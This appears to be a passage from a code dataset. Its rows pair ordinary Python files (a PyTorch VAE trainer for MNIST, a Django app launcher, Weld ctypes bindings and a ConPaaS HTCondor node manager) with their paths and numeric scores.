print("Apply early stopping")
break
self.writer.close()
print("-----Stop training-----")
print("-----Start Visualization-----")
self.model.load_state_dict(torch.load(f"./params/model_z_{self.z_dim}.pth"))
self.model.eval()
self.Visualize.createDirectories()
self.Visualize.reconstruction()
self.Visualize.latent_space()
self.Visualize.lattice_point()
self.Visualize.walkthrough()
print("-----Stop Visualization-----")
if __name__ == '__main__':
fire.Fire(Main) | main.py | import os
import fire
import numpy as np
import torch
from torch import optim
from torch.utils.tensorboard import SummaryWriter
from torchvision import datasets, transforms
from libs.Visualize import Visualize
from models.VAE import VAE
class Main():
def __init__(self, z_dim):
"""Constructor
Args:
z_dim (int): Dimensions of the latent variable.
Returns:
None.
"""
self.z_dim = z_dim
self.dataloader_train = None
self.dataloader_valid = None
self.dataloader_test = None
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.model = VAE(self.z_dim).to(self.device)
self.writer = SummaryWriter(log_dir="./logs")
self.lr = 0.001
self.optimizer = optim.Adam(self.model.parameters(), lr=self.lr)
self.num_max_epochs = 1000
self.num_no_improved = 0
self.num_batch_train = 0
self.num_batch_valid = 0
self.loss_valid = 10 ** 7 # Initialize with a large value
self.loss_valid_min = 10 ** 7 # Initialize with a large value
self.Visualize = Visualize(self.z_dim, self.dataloader_test, self.model, self.device)
def createDirectories(self):
"""Create directories for the tensorboard and learned model
Args:
None.
Returns:
None.
"""
if not os.path.exists("./logs"):
os.makedirs("./logs")
if not os.path.exists("./params"):
os.makedirs("./params")
def createDataLoader(self):
"""Download MNIST and convert it to data loaders
Args:
None.
Returns:
None.
"""
transform = transforms.Compose([transforms.ToTensor(), transforms.Lambda(lambda x: x.view(-1))]) # Preprocessing for MNIST images
dataset_train_valid = datasets.MNIST("./", train=True, download=True, transform=transform) # Separate train data and test data to get a dataset
dataset_test = datasets.MNIST("./", train=False, download=True, transform=transform)
# Use 20% of train data as validation data
size_train_valid = len(dataset_train_valid) # 60000
size_train = int(size_train_valid * 0.8) # 48000
size_valid = size_train_valid - size_train # 12000
dataset_train, dataset_valid = torch.utils.data.random_split(dataset_train_valid, [size_train, size_valid])
# Create dataloaders from the datasets
self.dataloader_train = torch.utils.data.DataLoader(dataset_train, batch_size=1000, shuffle=True)
self.dataloader_valid = torch.utils.data.DataLoader(dataset_valid, batch_size=1000, shuffle=False)
self.dataloader_test = torch.utils.data.DataLoader(dataset_test, batch_size=1000, shuffle=False)
self.Visualize.dataloader_test = self.dataloader_test
def train_batch(self):
"""Batch-based learning for training data
Args:
None.
Returns:
None.
"""
self.model.train()
for x, _ in self.dataloader_train:
lower_bound, _, _ = self.model(x, self.device)
loss = -sum(lower_bound)
self.model.zero_grad()
loss.backward()
self.optimizer.step()
self.writer.add_scalar("Loss_train/KL", -lower_bound[0].cpu().detach().numpy(), self.num_iter + self.num_batch_train)
self.writer.add_scalar("Loss_train/Reconst", -lower_bound[1].cpu().detach().numpy(), self.num_iter + self.num_batch_train)
self.num_batch_train += 1
self.num_batch_train -= 1
def valid_batch(self):
"""Batch-based learning for validating data
Args:
None.
Returns:
None.
"""
loss = []
self.model.eval()
for x, _ in self.dataloader_valid:
lower_bound, _, _ = self.model(x, self.device)
loss.append(-sum(lower_bound).cpu().detach().numpy())
self.writer.add_scalar("Loss_valid/KL", -lower_bound[0].cpu().detach().numpy(), self.num_iter + self.num_batch_valid)
self.writer.add_scalar("Loss_valid/Reconst", -lower_bound[1].cpu().detach().numpy(), self.num_iter + self.num_batch_valid)
self.num_batch_valid += 1
self.num_batch_valid -= 1
self.loss_valid = np.mean(loss)
self.loss_valid_min = np.minimum(self.loss_valid_min, self.loss_valid)
def early_stopping(self):
"""Judging early stopping
Args:
None.
Returns:
None.
"""
if self.loss_valid_min < self.loss_valid: # If the loss of this iteration is greater than the minimum loss of the previous iterations, the counter variable is incremented.
self.num_no_improved += 1
print(f"Validation got worse for the {self.num_no_improved} time in a row.")
else: # If the loss of this iteration is the same or smaller than the minimum loss of the previous iterations, reset the counter variable and save parameters.
self.num_no_improved = 0
torch.save(self.model.state_dict(), f"./params/model_z_{self.z_dim}.pth")
def main(self):
self.createDirectories()
self.createDataLoader()
print("-----Start training-----")
for self.num_iter in range(self.num_max_epochs):
self.train_batch()
self.valid_batch()
print(f"[EPOCH{self.num_iter + 1}] loss_valid: {int(self.loss_valid)} | Loss_valid_min: {int(self.loss_valid_min)}")
self.early_stopping()
if self.num_no_improved >= 10:
print("Apply early stopping")
break
self.writer.close()
print("-----Stop training-----")
print("-----Start Visualization-----")
self.model.load_state_dict(torch.load(f"./params/model_z_{self.z_dim}.pth"))
self.model.eval()
self.Visualize.createDirectories()
self.Visualize.reconstruction()
self.Visualize.latent_space()
self.Visualize.lattice_point()
self.Visualize.walkthrough()
print("-----Stop Visualization-----")
if __name__ == '__main__':
fire.Fire(Main) | 0.881207 | 0.416915 |
import subprocess
import httplib
import envoy
import socket
import time
import os
class App(object):
def __init__(self, host, port, root="~/.bam"):
self.host = host
self.port = port
self.root = root
self.proc = None
@property
def cmd(self):
"""Return the command to start this app, excluding the Python interpreter."""
return "manage.py runserver %d" % (self.port)
@property
def python(self):
"""Return the absolute path to the Python interpreter for this app."""
if self.venv:
return "%s/bin/python" % self.venv
else:
return "python"
@property
def venv(self):
"""
Return the path to the virtualenv for this app, as specified by the `.venv`
file in the project root. Return `None` if the file doesn't exist.
"""
filename = "%s/.venv" % self.path
if os.path.exists(filename):
venv = open(filename).read().strip()
return os.path.expanduser(venv)
@property
def environment(self):
filename = "%s/.bam-vars" % self.path
try:
with open(filename) as f:
return self._parse_env(f.read())
except:
return { }
@property
def path(self):
"""Return the path to this app."""
return os.path.join(os.path.expanduser(self.root), self.name)
@property
def name(self):
"""Return the name (hostname minus the TLD) of this app."""
return self.host.rsplit(".", 1)[0]
def _parse_env(self, env_str):
"""Parse an environment file (typically `.bam-env`) into a dict."""
env = {}
for line in env_str.strip().split():
key, val = line.split("=", 1)
env[key] = val
return env
def start(self):
print "Starting %r on %r in venv %r with env %r" % (self.name, self.port, self.venv, self.environment)
self.proc = self._connect("%s %s" % (self.python, self.cmd), cwd=self.path)
def stop(self):
self.proc.kill()
self.proc = None
def is_running(self):
"""Return `True` if this app is currently running."""
return self.proc and (self.proc.status_code is None)
def request(self, path, headers):
"""
Perform an HTTP request against this app, starting it if necessary. Return
an `httplib.HTTPResponse` object, or `None` if the app can't be reached.
"""
if not self.is_running():
self.start()
failures = 0
headers["X-Forwarded-Host"] = self.host
headers["X-Forwarded-Server"] = self.host
while True:
try:
conn = httplib.HTTPConnection("localhost", self.port)
conn.request("GET", path, headers=headers)
return conn.getresponse()
# If the port isn't open yet, keep on trying. The server probably hasn't
# warmed up yet. Give up if it doesn't work out within a few seconds.
except socket.error, e:
if (e.errno == 61) and (failures < 5):
failures += 1
time.sleep(1)
else:
return None
# Subprocesses are handled by Envoy, for now. I'm probably going to remove it
# and work directly with the subprocess interface, because it isn't nearly as
# painful as I remember.
def _connect(self, command, data=None, env=None, cwd=None):
command_str = envoy.expand_args(command).pop()
proc = subprocess.Popen(
command_str,
cwd=cwd,
env=self.environment,
stdin=None,
stdout=open("%s/bam.stdout.log" % cwd, "w"),
stderr=open("%s/bam.stderr.log" % cwd, "w"))
return envoy.ConnectedCommand(process=proc) | bam/app.py |
import subprocess
import httplib
import envoy
import socket
import time
import os
class App(object):
def __init__(self, host, port, root="~/.bam"):
self.host = host
self.port = port
self.root = root
self.proc = None
@property
def cmd(self):
"""Return the command to start this app, excluding the Python interpreter."""
return "manage.py runserver %d" % (self.port)
@property
def python(self):
"""Return the absolute path to the Python interpreter for this app."""
if self.venv:
return "%s/bin/python" % self.venv
else:
return "python"
@property
def venv(self):
"""
Return the path to the virtualenv for this app, as specified by the `.venv`
file in the project root. Return `None` if the file doesn't exist.
"""
filename = "%s/.venv" % self.path
if os.path.exists(filename):
venv = open(filename).read().strip()
return os.path.expanduser(venv)
@property
def environment(self):
filename = "%s/.bam-vars" % self.path
try:
with open(filename) as f:
return self._parse_env(f.read())
except:
return { }
@property
def path(self):
"""Return the path to this app."""
return os.path.join(os.path.expanduser(self.root), self.name)
@property
def name(self):
"""Return the name (hostname minus the TLD) of this app."""
return self.host.rsplit(".", 1)[0]
def _parse_env(self, env_str):
"""Parse an environment file (typically `.bam-env`) into a dict."""
env = {}
for line in env_str.strip().split():
key, val = line.split("=", 1)
env[key] = val
return env
def start(self):
print "Starting %r on %r in venv %r with env %r" % (self.name, self.port, self.venv, self.environment)
self.proc = self._connect("%s %s" % (self.python, self.cmd), cwd=self.path)
def stop(self):
self.proc.kill()
self.proc = None
def is_running(self):
"""Return `True` if this app is currently running."""
return self.proc and (self.proc.status_code is None)
def request(self, path, headers):
"""
Perform an HTTP request against this app, starting it if necessary. Return
an `httplib.HTTPResponse` object, or `None` if the app can't be reached.
"""
if not self.is_running():
self.start()
failures = 0
headers["X-Forwarded-Host"] = self.host
headers["X-Forwarded-Server"] = self.host
while True:
try:
conn = httplib.HTTPConnection("localhost", self.port)
conn.request("GET", path, headers=headers)
return conn.getresponse()
# If the port isn't open yet, keep on trying. The server probably hasn't
# warmed up yet. Give up if it doesn't work out within a few seconds.
except socket.error, e:
if (e.errno == 61) and (failures < 5):
failures += 1
time.sleep(1)
else:
return None
# Subprocesses are handled by Envoy, for now. I'm probably going to remove it
# and work directly with the subprocess interface, because it isn't nearly as
# painful as I remember.
def _connect(self, command, data=None, env=None, cwd=None):
command_str = envoy.expand_args(command).pop()
proc = subprocess.Popen(
command_str,
cwd=cwd,
env=self.environment,
stdin=None,
stdout=open("%s/bam.stdout.log" % cwd, "w"),
stderr=open("%s/bam.stderr.log" % cwd, "w"))
return envoy.ConnectedCommand(process=proc) | 0.740456 | 0.145905 |
import copy
import platform
from ctypes import *
import pkg_resources
system = platform.system()
if system == 'Linux':
lib_file = "../weld-latest/target/release/libweld.so"
elif system == 'Windows':
lib_file = "libweld.dll"
elif system == 'Darwin':
lib_file = "libweld.dylib"
else:
raise OSError("Unsupported platform {}", system)
lib_file = pkg_resources.resource_filename(__name__, lib_file)
weld = CDLL(lib_file, mode=RTLD_GLOBAL)
# Used for some type checking carried out by ctypes
class c_weld_module(c_void_p):
pass
class c_weld_conf(c_void_p):
pass
class c_weld_err(c_void_p):
pass
class c_weld_value(c_void_p):
pass
class c_weld_context(c_void_p):
pass
class WeldModule(c_void_p):
def __init__(self, code, conf, err):
weld_module_compile = weld.weld_module_compile
weld_module_compile.argtypes = [
c_char_p, c_weld_conf, c_weld_err]
weld_module_compile.restype = c_weld_module
code = c_char_p(code.encode('utf-8'))
self.module = weld_module_compile(code, conf.conf, err.error)
def run(self, conf, arg, err):
"""
WeldContext is currently hidden from the Python API. We create a new
context per Weld run and give ownership of it to the resulting value.
NOTE: This can leak the context if the result of the Weld run is an
error.
"""
weld_context_new = weld.weld_context_new
weld_context_new.argtypes = [c_weld_conf]
weld_context_new.restype = c_weld_context
ctx = weld_context_new(conf.conf)
weld_module_run = weld.weld_module_run
# module, context, arg, &err
weld_module_run.argtypes = [
c_weld_module, c_weld_context, c_weld_value, c_weld_err]
weld_module_run.restype = c_weld_value
ret = weld_module_run(self.module, ctx, arg.val, err.error)
return WeldValue(ret, assign=True, _ctx=ctx)
def __del__(self):
weld_module_free = weld.weld_module_free
weld_module_free.argtypes = [c_weld_module]
weld_module_free.restype = None
weld_module_free(self.module)
class WeldValue(c_void_p):
def __init__(self, value, assign=False, _ctx=None):
if assign is False:
weld_value_new = weld.weld_value_new
weld_value_new.argtypes = [c_void_p]
weld_value_new.restype = c_weld_value
self.val = weld_value_new(value)
else:
self.val = value
self._ctx = _ctx
self.freed = False
def _check(self):
if self.freed:
raise ValueError("Attempted to use freed WeldValue")
def data(self):
self._check()
weld_value_data = weld.weld_value_data
weld_value_data.argtypes = [c_weld_value]
weld_value_data.restype = c_void_p
return weld_value_data(self.val)
def memory_usage(self):
self._check()
weld_value_memory_usage = weld.weld_value_memory_usage
weld_value_memory_usage.argtypes = [c_weld_value]
weld_value_memory_usage.restype = c_int64
return weld_value_memory_usage(self.val)
def free(self):
self._check()
weld_value_free = weld.weld_value_free
weld_value_free.argtypes = [c_weld_value]
weld_value_free.restype = None
# One context per value for now -- free the context if there is one.
if self._ctx != None:
weld_context_free = weld.weld_context_free
weld_context_free.argtypes = [c_weld_context]
weld_context_free.restype = None
weld_context_free(self._ctx)
self._ctx = None
self.freed = True
return weld_value_free(self.val)
class WeldConf(c_void_p):
def __init__(self):
weld_conf_new = weld.weld_conf_new
weld_conf_new.argtypes = []
weld_conf_new.restype = c_weld_conf
self.conf = weld_conf_new()
def get(self, key):
key = c_char_p(key.encode('utf-8'))
weld_conf_get = weld.weld_conf_get
weld_conf_get.argtypes = [c_weld_conf, c_char_p]
weld_conf_get.restype = c_char_p
val = weld_conf_get(self.conf, key)
return copy.copy(val)
def set(self, key, value):
key = c_char_p(key.encode('utf-8'))
value = c_char_p(value.encode('utf-8'))
weld_conf_set = weld.weld_conf_set
weld_conf_set.argtypes = [c_weld_conf, c_char_p, c_char_p]
weld_conf_set.restype = None
weld_conf_set(self.conf, key, value)
def __del__(self):
weld_conf_free = weld.weld_conf_free
weld_conf_free.argtypes = [c_weld_conf]
weld_conf_free.restype = None
weld_conf_free(self.conf)
class WeldError(c_void_p):
def __init__(self):
weld_error_new = weld.weld_error_new
weld_error_new.argtypes = []
weld_error_new.restype = c_weld_err
self.error = weld_error_new()
def code(self):
weld_error_code = weld.weld_error_code
weld_error_code.argtypes = [c_weld_err]
weld_error_code.restype = c_uint64
return weld_error_code(self.error)
def message(self):
weld_error_message = weld.weld_error_message
weld_error_message.argtypes = [c_weld_err]
weld_error_message.restype = c_char_p
val = weld_error_message(self.error)
return copy.copy(val)
def __del__(self):
weld_error_free = weld.weld_error_free
weld_error_free.argtypes = [c_weld_err]
weld_error_free.restype = None
weld_error_free(self.error)
WeldLogLevelOff = 0
WeldLogLevelError = 1
WeldLogLevelWarn = 2
WeldLogLevelInfo = 3
WeldLogLevelDebug = 4
WeldLogLevelTrace = 5
def weld_set_log_level(log_level):
"""
Sets the log_level for Weld:
0 = No Logs,
1 = Error,
2 = Warn,
3 = Info,
4 = Debug,
5 = Trace.
"""
weld.weld_set_log_level(log_level) | python/benchmarks/weld-python/bindings_latest.py |
import copy
import platform
from ctypes import *
import pkg_resources
system = platform.system()
if system == 'Linux':
lib_file = "../weld-latest/target/release/libweld.so"
elif system == 'Windows':
lib_file = "libweld.dll"
elif system == 'Darwin':
lib_file = "libweld.dylib"
else:
raise OSError("Unsupported platform {}", system)
lib_file = pkg_resources.resource_filename(__name__, lib_file)
weld = CDLL(lib_file, mode=RTLD_GLOBAL)
# Used for some type checking carried out by ctypes
class c_weld_module(c_void_p):
pass
class c_weld_conf(c_void_p):
pass
class c_weld_err(c_void_p):
pass
class c_weld_value(c_void_p):
pass
class c_weld_context(c_void_p):
pass
class WeldModule(c_void_p):
def __init__(self, code, conf, err):
weld_module_compile = weld.weld_module_compile
weld_module_compile.argtypes = [
c_char_p, c_weld_conf, c_weld_err]
weld_module_compile.restype = c_weld_module
code = c_char_p(code.encode('utf-8'))
self.module = weld_module_compile(code, conf.conf, err.error)
def run(self, conf, arg, err):
"""
WeldContext is currently hidden from the Python API. We create a new
context per Weld run and give ownership of it to the resulting value.
NOTE: This can leak the context if the result of the Weld run is an
error.
"""
weld_context_new = weld.weld_context_new
weld_context_new.argtypes = [c_weld_conf]
weld_context_new.restype = c_weld_context
ctx = weld_context_new(conf.conf)
weld_module_run = weld.weld_module_run
# module, context, arg, &err
weld_module_run.argtypes = [
c_weld_module, c_weld_context, c_weld_value, c_weld_err]
weld_module_run.restype = c_weld_value
ret = weld_module_run(self.module, ctx, arg.val, err.error)
return WeldValue(ret, assign=True, _ctx=ctx)
def __del__(self):
weld_module_free = weld.weld_module_free
weld_module_free.argtypes = [c_weld_module]
weld_module_free.restype = None
weld_module_free(self.module)
class WeldValue(c_void_p):
def __init__(self, value, assign=False, _ctx=None):
if assign is False:
weld_value_new = weld.weld_value_new
weld_value_new.argtypes = [c_void_p]
weld_value_new.restype = c_weld_value
self.val = weld_value_new(value)
else:
self.val = value
self._ctx = _ctx
self.freed = False
def _check(self):
if self.freed:
raise ValueError("Attempted to use freed WeldValue")
def data(self):
self._check()
weld_value_data = weld.weld_value_data
weld_value_data.argtypes = [c_weld_value]
weld_value_data.restype = c_void_p
return weld_value_data(self.val)
def memory_usage(self):
self._check()
weld_value_memory_usage = weld.weld_value_memory_usage
weld_value_memory_usage.argtypes = [c_weld_value]
weld_value_memory_usage.restype = c_int64
return weld_value_memory_usage(self.val)
def free(self):
self._check()
weld_value_free = weld.weld_value_free
weld_value_free.argtypes = [c_weld_value]
weld_value_free.restype = None
# One context per value for now -- free the context if there is one.
if self._ctx != None:
weld_context_free = weld.weld_context_free
weld_context_free.argtypes = [c_weld_context]
weld_context_free.restype = None
weld_context_free(self._ctx)
self._ctx = None
self.freed = True
return weld_value_free(self.val)
class WeldConf(c_void_p):
def __init__(self):
weld_conf_new = weld.weld_conf_new
weld_conf_new.argtypes = []
weld_conf_new.restype = c_weld_conf
self.conf = weld_conf_new()
def get(self, key):
key = c_char_p(key.encode('utf-8'))
weld_conf_get = weld.weld_conf_get
weld_conf_get.argtypes = [c_weld_conf, c_char_p]
weld_conf_get.restype = c_char_p
val = weld_conf_get(self.conf, key)
return copy.copy(val)
def set(self, key, value):
key = c_char_p(key.encode('utf-8'))
value = c_char_p(value.encode('utf-8'))
weld_conf_set = weld.weld_conf_set
weld_conf_set.argtypes = [c_weld_conf, c_char_p, c_char_p]
weld_conf_set.restype = None
weld_conf_set(self.conf, key, value)
def __del__(self):
weld_conf_free = weld.weld_conf_free
weld_conf_free.argtypes = [c_weld_conf]
weld_conf_free.restype = None
weld_conf_free(self.conf)
class WeldError(c_void_p):
def __init__(self):
weld_error_new = weld.weld_error_new
weld_error_new.argtypes = []
weld_error_new.restype = c_weld_err
self.error = weld_error_new()
def code(self):
weld_error_code = weld.weld_error_code
weld_error_code.argtypes = [c_weld_err]
weld_error_code.restype = c_uint64
return weld_error_code(self.error)
def message(self):
weld_error_message = weld.weld_error_message
weld_error_message.argtypes = [c_weld_err]
weld_error_message.restype = c_char_p
val = weld_error_message(self.error)
return copy.copy(val)
def __del__(self):
weld_error_free = weld.weld_error_free
weld_error_free.argtypes = [c_weld_err]
weld_error_free.restype = None
weld_error_free(self.error)
WeldLogLevelOff = 0
WeldLogLevelError = 1
WeldLogLevelWarn = 2
WeldLogLevelInfo = 3
WeldLogLevelDebug = 4
WeldLogLevelTrace = 5
def weld_set_log_level(log_level):
"""
Sets the log_level for Weld:
0 = No Logs,
1 = Error,
2 = Warn,
3 = Info,
4 = Debug,
5 = Trace.
"""
weld.weld_set_log_level(log_level) | 0.428592 | 0.087019 |
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.htcondor.agent import client
import node_info
class HTCondorManager(BaseManager):
"""Manager class with the following exposed methods:
shutdown() -- POST
add_nodes(count) -- POST
remove_nodes(count) -- POST
list_nodes() -- GET
get_service_info() -- GET
get_node_info(serviceNodeId) -- GET
"""
def __init__(self, config_parser, **kwargs):
"""Initialize a HTCondor Manager.
'config_parser' represents the manager config file.
**kwargs holds anything that can't be sent in config_parser."""
BaseManager.__init__(self, config_parser)
self.nodes = []
# Setup the clouds' controller
self.controller.generate_context('htcondor')
self.hub_ip = None
def _do_startup(self, cloud):
"""Start up the service. The first node will be an agent running a
HTCondor Hub and a HTCondor Node."""
startCloud = self._init_cloud(cloud)
vals = { 'action': '_do_startup', 'count': 1 }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
try:
nodes = self.controller.create_nodes(1,
client.check_agent_process, self.AGENT_PORT, startCloud)
hub_node = nodes[0]
# The first agent is a HTCondor Hub and a HTCondor Node
client.create_hub(hub_node.ip, self.AGENT_PORT)
client.create_node(hub_node.ip, self.AGENT_PORT, hub_node.ip)
self.logger.info("Added node %s: %s " % (hub_node.id, hub_node.ip))
node_info.add_node_info('/etc/hosts', hub_node.ip, hub_node.id)
self.hub_ip = hub_node.ip
# Extend the nodes list with the newly created one
self.nodes += nodes
self.state = self.S_RUNNING
except Exception, err:
self.logger.exception('_do_startup: Failed to create hub: %s' % err)
self.state = self.S_ERROR
def _do_stop(self):
"""Delete all nodes and switch to status STOPPED"""
self.controller.delete_nodes(self.nodes)
self.nodes = [] # Not only delete the nodes, but clear the list too
self.state = self.S_STOPPED
def __check_count_in_args(self, kwargs):
"""Return 'count' if all is good. HttpErrorResponse otherwise."""
# The frontend sends count under 'node'.
if 'node' in kwargs:
kwargs['count'] = kwargs['node']
if not 'count' in kwargs:
return HttpErrorResponse(self.REQUIRED_ARG_MSG % { 'arg': 'count' })
if not isinstance(kwargs['count'], int):
return HttpErrorResponse(
"ERROR: Expected an integer value for 'count'")
return int(kwargs['count'])
@expose('POST')
def add_nodes(self, kwargs):
"""Add kwargs['count'] nodes to this deployment"""
self.controller.add_context_replacement(dict(STRING='htcondor'))
# Adding nodes makes sense only in the RUNNING state
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'add_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[count, kwargs['cloud']]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_add_nodes(self, count, cloud):
"""Add 'count' HTCondor Nodes to this deployment"""
startCloud = self._init_cloud(cloud)
vals = { 'action': '_do_add_nodes', 'count': count }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
node_instances = self.controller.create_nodes(count,
client.check_agent_process, self.AGENT_PORT, startCloud)
# Startup agents
for node in node_instances:
client.create_node(node.ip, self.AGENT_PORT, self.hub_ip)
self.logger.info("Added node %s: %s " % (node.id, node.ip))
node_info.add_node_info('/etc/hosts', node.ip, node.id)
self.nodes += node_instances
self.state = self.S_RUNNING
@expose('POST')
def remove_nodes(self, kwargs):
"""Remove kwargs['count'] nodes from this deployment"""
# Removing nodes only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'remove_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
if count > len(self.nodes) - 1:
return HttpErrorResponse("ERROR: Cannot remove so many nodes")
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[count]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_remove_nodes(self, count):
"""Remove 'count' nodes, starting from the end of the list. This way
the HTCondor Hub gets removed last."""
for _ in range(count):
node = self.nodes.pop()
self.logger.info("Removing node with IP %s" % node.ip)
self.controller.delete_nodes([ node ])
node_info.remove_node_info('/etc/hosts', node.ip)
self.state = self.S_RUNNING
def __is_hub(self, node):
"""Return True if the given node is the HTCondor Hub"""
return node.ip == self.hub_ip
@expose('GET')
def list_nodes(self, kwargs):
"""Return a list of running nodes"""
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'list_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
htcondor_nodes = [
node.id for node in self.nodes if not self.__is_hub(node)
]
htcondor_hub = [
node.id for node in self.nodes if self.__is_hub(node)
]
return HttpJsonResponse({
'hub': htcondor_hub,
'node': htcondor_nodes
})
@expose('GET')
def get_service_info(self, kwargs):
"""Return the service state and type"""
return HttpJsonResponse({'state': self.state, 'type': 'htcondor'})
@expose('GET')
def get_node_info(self, kwargs):
"""Return information about the node identified by the given
kwargs['serviceNodeId']"""
# serviceNodeId is a required parameter
if 'serviceNodeId' not in kwargs:
vals = { 'arg': 'serviceNodeId' }
return HttpErrorResponse(self.REQUIRED_ARG_MSG % vals)
serviceNodeId = kwargs.pop('serviceNodeId')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse(
'ERROR: Cannot find node with serviceNode=%s' % serviceNodeId)
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'is_hub': self.__is_hub(serviceNode)
}
}) | conpaas-services/src/conpaas/services/htcondor/manager/manager.py | from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.htcondor.agent import client
import node_info
class HTCondorManager(BaseManager):
"""Manager class with the following exposed methods:
shutdown() -- POST
add_nodes(count) -- POST
remove_nodes(count) -- POST
list_nodes() -- GET
get_service_info() -- GET
get_node_info(serviceNodeId) -- GET
"""
def __init__(self, config_parser, **kwargs):
"""Initialize a HTCondor Manager.
'config_parser' represents the manager config file.
**kwargs holds anything that can't be sent in config_parser."""
BaseManager.__init__(self, config_parser)
self.nodes = []
# Setup the clouds' controller
self.controller.generate_context('htcondor')
self.hub_ip = None
def _do_startup(self, cloud):
"""Start up the service. The first node will be an agent running a
HTCondor Hub and a HTCondor Node."""
startCloud = self._init_cloud(cloud)
vals = { 'action': '_do_startup', 'count': 1 }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
try:
nodes = self.controller.create_nodes(1,
client.check_agent_process, self.AGENT_PORT, startCloud)
hub_node = nodes[0]
# The first agent is a HTCondor Hub and a HTCondor Node
client.create_hub(hub_node.ip, self.AGENT_PORT)
client.create_node(hub_node.ip, self.AGENT_PORT, hub_node.ip)
self.logger.info("Added node %s: %s " % (hub_node.id, hub_node.ip))
node_info.add_node_info('/etc/hosts', hub_node.ip, hub_node.id)
self.hub_ip = hub_node.ip
# Extend the nodes list with the newly created one
self.nodes += nodes
self.state = self.S_RUNNING
except Exception, err:
self.logger.exception('_do_startup: Failed to create hub: %s' % err)
self.state = self.S_ERROR
def _do_stop(self):
"""Delete all nodes and switch to status STOPPED"""
self.controller.delete_nodes(self.nodes)
self.nodes = [] # Not only delete the nodes, but clear the list too
self.state = self.S_STOPPED
def __check_count_in_args(self, kwargs):
"""Return 'count' if all is good. HttpErrorResponse otherwise."""
# The frontend sends count under 'node'.
if 'node' in kwargs:
kwargs['count'] = kwargs['node']
if not 'count' in kwargs:
return HttpErrorResponse(self.REQUIRED_ARG_MSG % { 'arg': 'count' })
if not isinstance(kwargs['count'], int):
return HttpErrorResponse(
"ERROR: Expected an integer value for 'count'")
return int(kwargs['count'])
@expose('POST')
def add_nodes(self, kwargs):
"""Add kwargs['count'] nodes to this deployment"""
self.controller.add_context_replacement(dict(STRING='htcondor'))
# Adding nodes makes sense only in the RUNNING state
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'add_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[count, kwargs['cloud']]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_add_nodes(self, count, cloud):
"""Add 'count' HTCondor Nodes to this deployment"""
startCloud = self._init_cloud(cloud)
vals = { 'action': '_do_add_nodes', 'count': count }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
node_instances = self.controller.create_nodes(count,
client.check_agent_process, self.AGENT_PORT, startCloud)
# Startup agents
for node in node_instances:
client.create_node(node.ip, self.AGENT_PORT, self.hub_ip)
self.logger.info("Added node %s: %s " % (node.id, node.ip))
node_info.add_node_info('/etc/hosts', node.ip, node.id)
self.nodes += node_instances
self.state = self.S_RUNNING
@expose('POST')
def remove_nodes(self, kwargs):
"""Remove kwargs['count'] nodes from this deployment"""
# Removing nodes only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'remove_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
if count > len(self.nodes) - 1:
return HttpErrorResponse("ERROR: Cannot remove so many nodes")
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[count]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_remove_nodes(self, count):
"""Remove 'count' nodes, starting from the end of the list. This way
the HTCondor Hub gets removed last."""
for _ in range(count):
node = self.nodes.pop()
self.logger.info("Removing node with IP %s" % node.ip)
self.controller.delete_nodes([ node ])
node_info.remove_node_info('/etc/hosts', node.ip)
self.state = self.S_RUNNING
def __is_hub(self, node):
"""Return True if the given node is the HTCondor Hub"""
return node.ip == self.hub_ip
@expose('GET')
def list_nodes(self, kwargs):
"""Return a list of running nodes"""
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'list_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
htcondor_nodes = [
node.id for node in self.nodes if not self.__is_hub(node)
]
htcondor_hub = [
node.id for node in self.nodes if self.__is_hub(node)
]
return HttpJsonResponse({
'hub': htcondor_hub,
'node': htcondor_nodes
})
@expose('GET')
def get_service_info(self, kwargs):
"""Return the service state and type"""
return HttpJsonResponse({'state': self.state, 'type': 'htcondor'})
@expose('GET')
def get_node_info(self, kwargs):
"""Return information about the node identified by the given
kwargs['serviceNodeId']"""
# serviceNodeId is a required parameter
if 'serviceNodeId' not in kwargs:
vals = { 'arg': 'serviceNodeId' }
